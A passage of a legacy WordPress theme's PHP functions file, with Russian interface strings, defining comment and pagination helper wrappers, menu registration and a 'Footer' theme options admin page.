		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
